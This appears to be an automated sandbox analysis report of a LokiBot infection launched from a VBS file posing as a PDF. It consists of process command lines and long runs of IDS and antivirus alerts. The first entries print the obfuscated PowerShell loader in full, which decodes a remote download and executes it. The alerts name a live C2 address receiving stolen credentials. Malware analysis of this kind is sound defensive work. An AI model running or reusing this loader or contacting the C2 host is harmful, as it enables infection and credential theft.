                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs", ProcessId: 1988, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderiern
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:50:19.722830+020020243121A Network Trojan was detected192.168.2.565313137.184.191.21580TCP
                2024-10-01T07:50:22.492536+020020243121A Network Trojan was detected192.168.2.565314137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:50:17.173892+020020253811Malware Command and Control Activity Detected192.168.2.565313137.184.191.21580TCP
                2024-10-01T07:50:19.797177+020020253811Malware Command and Control Activity Detected192.168.2.565314137.184.191.21580TCP
                2024-10-01T07:50:22.586132+020020253811Malware Command and Control Activity Detected192.168.2.565315137.184.191.21580TCP
                2024-10-01T07:50:25.349105+020020253811Malware Command and Control Activity Detected192.168.2.565316137.184.191.21580TCP
                2024-10-01T07:50:28.274534+020020253811Malware Command and Control Activity Detected192.168.2.565317137.184.191.21580TCP
                2024-10-01T07:50:31.128558+020020253811Malware Command and Control Activity Detected192.168.2.565318137.184.191.21580TCP
                2024-10-01T07:50:33.929630+020020253811Malware Command and Control Activity Detected192.168.2.565319137.184.191.21580TCP
                2024-10-01T07:50:36.850013+020020253811Malware Command and Control Activity Detected192.168.2.565320137.184.191.21580TCP
                2024-10-01T07:50:39.646324+020020253811Malware Command and Control Activity Detected192.168.2.565321137.184.191.21580TCP
                2024-10-01T07:50:42.441873+020020253811Malware Command and Control Activity Detected192.168.2.565322137.184.191.21580TCP
                2024-10-01T07:50:45.176865+020020253811Malware Command and Control Activity Detected192.168.2.565323137.184.191.21580TCP
                2024-10-01T07:50:47.882333+020020253811Malware Command and Control Activity Detected192.168.2.565324137.184.191.21580TCP
                2024-10-01T07:50:50.691800+020020253811Malware Command and Control Activity Detected192.168.2.565325137.184.191.21580TCP
                2024-10-01T07:50:53.822128+020020253811Malware Command and Control Activity Detected192.168.2.565326137.184.191.21580TCP
                2024-10-01T07:50:56.584716+020020253811Malware Command and Control Activity Detected192.168.2.565327137.184.191.21580TCP
                2024-10-01T07:50:59.581594+020020253811Malware Command and Control Activity Detected192.168.2.565328137.184.191.21580TCP
                2024-10-01T07:51:02.303353+020020253811Malware Command and Control Activity Detected192.168.2.565329137.184.191.21580TCP
                2024-10-01T07:51:05.050083+020020253811Malware Command and Control Activity Detected192.168.2.565330137.184.191.21580TCP
                2024-10-01T07:51:07.830751+020020253811Malware Command and Control Activity Detected192.168.2.565331137.184.191.21580TCP
                2024-10-01T07:51:10.603999+020020253811Malware Command and Control Activity Detected192.168.2.565332137.184.191.21580TCP
                2024-10-01T07:51:13.301215+020020253811Malware Command and Control Activity Detected192.168.2.565333137.184.191.21580TCP
                2024-10-01T07:51:16.098837+020020253811Malware Command and Control Activity Detected192.168.2.565334137.184.191.21580TCP
                2024-10-01T07:51:18.891593+020020253811Malware Command and Control Activity Detected192.168.2.565335137.184.191.21580TCP
                2024-10-01T07:51:21.660429+020020253811Malware Command and Control Activity Detected192.168.2.565336137.184.191.21580TCP
                2024-10-01T07:51:24.397671+020020253811Malware Command and Control Activity Detected192.168.2.565337137.184.191.21580TCP
                2024-10-01T07:51:27.195364+020020253811Malware Command and Control Activity Detected192.168.2.565338137.184.191.21580TCP
                2024-10-01T07:51:30.009648+020020253811Malware Command and Control Activity Detected192.168.2.565339137.184.191.21580TCP
                2024-10-01T07:51:32.776795+020020253811Malware Command and Control Activity Detected192.168.2.565340137.184.191.21580TCP
                2024-10-01T07:51:35.646525+020020253811Malware Command and Control Activity Detected192.168.2.565341137.184.191.21580TCP
                2024-10-01T07:51:38.427887+020020253811Malware Command and Control Activity Detected192.168.2.565342137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:50:25.189714+020020243131Malware Command and Control Activity Detected192.168.2.565315137.184.191.21580TCP
                2024-10-01T07:50:28.108644+020020243131Malware Command and Control Activity Detected192.168.2.565316137.184.191.21580TCP
                2024-10-01T07:50:30.981103+020020243131Malware Command and Control Activity Detected192.168.2.565317137.184.191.21580TCP
                2024-10-01T07:50:33.776083+020020243131Malware Command and Control Activity Detected192.168.2.565318137.184.191.21580TCP
                2024-10-01T07:50:36.691428+020020243131Malware Command and Control Activity Detected192.168.2.565319137.184.191.21580TCP
                2024-10-01T07:50:39.490591+020020243131Malware Command and Control Activity Detected192.168.2.565320137.184.191.21580TCP
                2024-10-01T07:50:42.286069+020020243131Malware Command and Control Activity Detected192.168.2.565321137.184.191.21580TCP
                2024-10-01T07:50:45.008830+020020243131Malware Command and Control Activity Detected192.168.2.565322137.184.191.21580TCP
                2024-10-01T07:50:47.717956+020020243131Malware Command and Control Activity Detected192.168.2.565323137.184.191.21580TCP
                2024-10-01T07:50:50.529276+020020243131Malware Command and Control Activity Detected192.168.2.565324137.184.191.21580TCP
                2024-10-01T07:50:53.299070+020020243131Malware Command and Control Activity Detected192.168.2.565325137.184.191.21580TCP
                2024-10-01T07:50:56.411109+020020243131Malware Command and Control Activity Detected192.168.2.565326137.184.191.21580TCP
                2024-10-01T07:50:59.419708+020020243131Malware Command and Control Activity Detected192.168.2.565327137.184.191.21580TCP
                2024-10-01T07:51:02.151753+020020243131Malware Command and Control Activity Detected192.168.2.565328137.184.191.21580TCP
                2024-10-01T07:51:04.892615+020020243131Malware Command and Control Activity Detected192.168.2.565329137.184.191.21580TCP
                2024-10-01T07:51:07.677000+020020243131Malware Command and Control Activity Detected192.168.2.565330137.184.191.21580TCP
                2024-10-01T07:51:10.438149+020020243131Malware Command and Control Activity Detected192.168.2.565331137.184.191.21580TCP
                2024-10-01T07:51:13.143576+020020243131Malware Command and Control Activity Detected192.168.2.565332137.184.191.21580TCP
                2024-10-01T07:51:15.949625+020020243131Malware Command and Control Activity Detected192.168.2.565333137.184.191.21580TCP
                2024-10-01T07:51:18.675206+020020243131Malware Command and Control Activity Detected192.168.2.565334137.184.191.21580TCP
                2024-10-01T07:51:21.495905+020020243131Malware Command and Control Activity Detected192.168.2.565335137.184.191.21580TCP
                2024-10-01T07:51:24.246269+020020243131Malware Command and Control Activity Detected192.168.2.565336137.184.191.21580TCP
                2024-10-01T07:51:27.042555+020020243131Malware Command and Control Activity Detected192.168.2.565337137.184.191.21580TCP
                2024-10-01T07:51:29.857091+020020243131Malware Command and Control Activity Detected192.168.2.565338137.184.191.21580TCP
                2024-10-01T07:51:32.612078+020020243131Malware Command and Control Activity Detected192.168.2.565339137.184.191.21580TCP
                2024-10-01T07:51:35.482901+020020243131Malware Command and Control Activity Detected192.168.2.565340137.184.191.21580TCP
                2024-10-01T07:51:38.277828+020020243131Malware Command and Control Activity Detected192.168.2.565341137.184.191.21580TCP
                2024-10-01T07:51:41.101759+020020243131Malware Command and Control Activity Detected192.168.2.565342137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:50:25.189714+020020243181Malware Command and Control Activity Detected192.168.2.565315137.184.191.21580TCP
                2024-10-01T07:50:28.108644+020020243181Malware Command and Control Activity Detected192.168.2.565316137.184.191.21580TCP
                2024-10-01T07:50:30.981103+020020243181Malware Command and Control Activity Detected192.168.2.565317137.184.191.21580TCP
                2024-10-01T07:50:33.776083+020020243181Malware Command and Control Activity Detected192.168.2.565318137.184.191.21580TCP
                2024-10-01T07:50:36.691428+020020243181Malware Command and Control Activity Detected192.168.2.565319137.184.191.21580TCP
                2024-10-01T07:50:39.490591+020020243181Malware Command and Control Activity Detected192.168.2.565320137.184.191.21580TCP
                2024-10-01T07:50:42.286069+020020243181Malware Command and Control Activity Detected192.168.2.565321137.184.191.21580TCP
                2024-10-01T07:50:45.008830+020020243181Malware Command and Control Activity Detected192.168.2.565322137.184.191.21580TCP
                2024-10-01T07:50:47.717956+020020243181Malware Command and Control Activity Detected192.168.2.565323137.184.191.21580TCP
                2024-10-01T07:50:50.529276+020020243181Malware Command and Control Activity Detected192.168.2.565324137.184.191.21580TCP
                2024-10-01T07:50:53.299070+020020243181Malware Command and Control Activity Detected192.168.2.565325137.184.191.21580TCP
                2024-10-01T07:50:56.411109+020020243181Malware Command and Control Activity Detected192.168.2.565326137.184.191.21580TCP
                2024-10-01T07:50:59.419708+020020243181Malware Command and Control Activity Detected192.168.2.565327137.184.191.21580TCP
                2024-10-01T07:51:02.151753+020020243181Malware Command and Control Activity Detected192.168.2.565328137.184.191.21580TCP
                2024-10-01T07:51:04.892615+020020243181Malware Command and Control Activity Detected192.168.2.565329137.184.191.21580TCP
                2024-10-01T07:51:07.677000+020020243181Malware Command and Control Activity Detected192.168.2.565330137.184.191.21580TCP
                2024-10-01T07:51:10.438149+020020243181Malware Command and Control Activity Detected192.168.2.565331137.184.191.21580TCP
                2024-10-01T07:51:13.143576+020020243181Malware Command and Control Activity Detected192.168.2.565332137.184.191.21580TCP
                2024-10-01T07:51:15.949625+020020243181Malware Command and Control Activity Detected192.168.2.565333137.184.191.21580TCP
                2024-10-01T07:51:18.675206+020020243181Malware Command and Control Activity Detected192.168.2.565334137.184.191.21580TCP
                2024-10-01T07:51:21.495905+020020243181Malware Command and Control Activity Detected192.168.2.565335137.184.191.21580TCP
                2024-10-01T07:51:24.246269+020020243181Malware Command and Control Activity Detected192.168.2.565336137.184.191.21580TCP
                2024-10-01T07:51:27.042555+020020243181Malware Command and Control Activity Detected192.168.2.565337137.184.191.21580TCP
                2024-10-01T07:51:29.857091+020020243181Malware Command and Control Activity Detected192.168.2.565338137.184.191.21580TCP
                2024-10-01T07:51:32.612078+020020243181Malware Command and Control Activity Detected192.168.2.565339137.184.191.21580TCP
                2024-10-01T07:51:35.482901+020020243181Malware Command and Control Activity Detected192.168.2.565340137.184.191.21580TCP
                2024-10-01T07:51:38.277828+020020243181Malware Command and Control Activity Detected192.168.2.565341137.184.191.21580TCP
                2024-10-01T07:51:41.101759+020020243181Malware Command and Control Activity Detected192.168.2.565342137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:50:17.173892+020020216411A Network Trojan was detected192.168.2.565313137.184.191.21580TCP
                2024-10-01T07:50:19.797177+020020216411A Network Trojan was detected192.168.2.565314137.184.191.21580TCP
                2024-10-01T07:50:22.586132+020020216411A Network Trojan was detected192.168.2.565315137.184.191.21580TCP
                2024-10-01T07:50:25.349105+020020216411A Network Trojan was detected192.168.2.565316137.184.191.21580TCP
                2024-10-01T07:50:28.274534+020020216411A Network Trojan was detected192.168.2.565317137.184.191.21580TCP
                2024-10-01T07:50:31.128558+020020216411A Network Trojan was detected192.168.2.565318137.184.191.21580TCP
                2024-10-01T07:50:33.929630+020020216411A Network Trojan was detected192.168.2.565319137.184.191.21580TCP
                2024-10-01T07:50:36.850013+020020216411A Network Trojan was detected192.168.2.565320137.184.191.21580TCP
                2024-10-01T07:50:39.646324+020020216411A Network Trojan was detected192.168.2.565321137.184.191.21580TCP
                2024-10-01T07:50:42.441873+020020216411A Network Trojan was detected192.168.2.565322137.184.191.21580TCP
                2024-10-01T07:50:45.176865+020020216411A Network Trojan was detected192.168.2.565323137.184.191.21580TCP
                2024-10-01T07:50:47.882333+020020216411A Network Trojan was detected192.168.2.565324137.184.191.21580TCP
                2024-10-01T07:50:50.691800+020020216411A Network Trojan was detected192.168.2.565325137.184.191.21580TCP
                2024-10-01T07:50:53.822128+020020216411A Network Trojan was detected192.168.2.565326137.184.191.21580TCP
                2024-10-01T07:50:56.584716+020020216411A Network Trojan was detected192.168.2.565327137.184.191.21580TCP
                2024-10-01T07:50:59.581594+020020216411A Network Trojan was detected192.168.2.565328137.184.191.21580TCP
                2024-10-01T07:51:02.303353+020020216411A Network Trojan was detected192.168.2.565329137.184.191.21580TCP
                2024-10-01T07:51:05.050083+020020216411A Network Trojan was detected192.168.2.565330137.184.191.21580TCP
                2024-10-01T07:51:07.830751+020020216411A Network Trojan was detected192.168.2.565331137.184.191.21580TCP
                2024-10-01T07:51:10.603999+020020216411A Network Trojan was detected192.168.2.565332137.184.191.21580TCP
                2024-10-01T07:51:13.301215+020020216411A Network Trojan was detected192.168.2.565333137.184.191.21580TCP
                2024-10-01T07:51:16.098837+020020216411A Network Trojan was detected192.168.2.565334137.184.191.21580TCP
                2024-10-01T07:51:18.891593+020020216411A Network Trojan was detected192.168.2.565335137.184.191.21580TCP
                2024-10-01T07:51:21.660429+020020216411A Network Trojan was detected192.168.2.565336137.184.191.21580TCP
                2024-10-01T07:51:24.397671+020020216411A Network Trojan was detected192.168.2.565337137.184.191.21580TCP
                2024-10-01T07:51:27.195364+020020216411A Network Trojan was detected192.168.2.565338137.184.191.21580TCP
                2024-10-01T07:51:30.009648+020020216411A Network Trojan was detected192.168.2.565339137.184.191.21580TCP
                2024-10-01T07:51:32.776795+020020216411A Network Trojan was detected192.168.2.565340137.184.191.21580TCP
                2024-10-01T07:51:35.646525+020020216411A Network Trojan was detected192.168.2.565341137.184.191.21580TCP
                2024-10-01T07:51:38.427887+020020216411A Network Trojan was detected192.168.2.565342137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:50:12.725465+020028032702Potentially Bad Traffic192.168.2.565310216.58.206.46443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://137.184.191.215/index.php/10899Virustotal: Detection: 10%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:65310 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:65312 version: TLS 1.2
                Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3031770631.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdbGCTL source: 31437F.exe.20.dr
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3052757147.00000000076AB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dxdiag.pdb source: 31437F.exe.20.dr

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65317 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65318 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65318 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65324 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65324 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65339 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65339 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65318 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65318 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65323 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65323 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65321 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65328 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65332 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65332 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65320 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65319 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65319 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65316 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65324 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65321 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65339 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65323 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65339 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65329 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65320 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65342 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65321 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65321 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65315 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65315 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65330 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65316 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65330 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65324 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65319 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65319 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65320 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65320 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65328 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65330 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65330 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65328 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65332 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65329 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65332 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65313 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65316 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65313 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65317 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65329 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65340 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65323 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:65313 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65340 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65328 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65325 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65316 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:65315 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:65315 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65338 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65342 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65338 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:65325 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:65322 -> 137.184.191.215:80
